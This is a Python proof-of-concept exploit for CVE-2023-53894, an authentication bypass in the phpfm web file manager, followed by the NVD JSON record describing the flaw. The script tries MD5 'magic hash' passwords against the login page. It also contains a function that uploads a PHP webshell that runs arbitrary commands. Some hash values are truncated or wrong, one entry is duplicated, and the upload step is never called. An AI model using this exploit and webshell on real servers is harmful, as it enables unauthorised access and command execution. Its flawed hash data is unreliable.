CVE-2023-53894

# CVE-2023-53894 Authentication Bypass PoC # Target: phpfm <= 1.7.9 # Attack: Type Juggling in password hash validation import requests import hashlib target_url = "http://target.com/phpfm" # Known passwords with MD5 hashes starting with 0e magic_passwords = [ "240610708", # MD5: 0e4340419627524296 "QNKCDZO", # MD5: 0e830400451993494058024219903391 "s878926199a", # MD5: 0e545993274517709034328855841020 "s155964671a", # MD5: 0e342768416822451524974117254469 "s214587387a", # MD5: 0e848240845830648910665489740247 "s214587387a" # MD5: 0e848240845830648910665489740247 ] def check_vulnerability(): """Check if target is vulnerable to CVE-2023-53894""" print(f"[*] Testing target: {target_url}") for password in magic_passwords: md5_hash = hashlib.md5(password.encode()).hexdigest() print(f"[*] Trying password: {password} (MD5: {md5_hash})") # Attempt login with magic password login_data = { "username": "admin", "password": password } try: response = requests.post(f"{target_url}/login.php", data=login_data, timeout=10) if response.status_code == 200: if "success" in response.text.lower() or response.status_code == 302: print(f"[!] VULNERABLE! Login successful with password: {password}") print(f"[+] MD5 hash: {md5_hash}") return True except Exception as e: print(f"[-] Error: {e}") print("[-] Target may not be vulnerable or already patched") return False def upload_shell(session_cookie): """Upload malicious PHP file after successful authentication""" print("[*] Uploading webshell...") webshell = "<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>" files = { 'file': ('shell.php', webshell, 'application/x-php') } cookies = {'PHPSESSID': session_cookie} try: response = requests.post(f"{target_url}/upload.php", files=files, cookies=cookies) if response.status_code == 200: print("[+] Webshell uploaded successfully!") print(f"[*] Access shell at: {target_url}/uploads/shell.php?cmd=whoami") except Exception as e: print(f"[-] Upload failed: {e}") if __name__ == "__main__": check_vulnerability()

{"cve": {"id": "CVE-2023-53894", "sourceIdentifier": "[email protected]", "published": "2025-12-16T17:16:01.550", "lastModified": "2026-01-21T22:26:08.933", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "phpfm 1.7.9 contains an authentication bypass vulnerability that allows attackers to log in by exploiting loose type comparison in password hash validation. Attackers can craft specific password hashes beginning with 0e or 00e to bypass authentication and upload malicious PHP files to the server."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1390"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dulldusk:phpfilemanager:1.7.9:*:*:*:*:*:*:*", "matchCriteriaId": "39FEDC79-A728-437C-9C55-BF2FE3814283"}]}]}], "references": [{"url": "https://www.dulldusk.com/phpfm/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/51594", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.vulncheck.com/advisories/phpfm-authentication-bypass-via-type-juggling-vulnerability", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}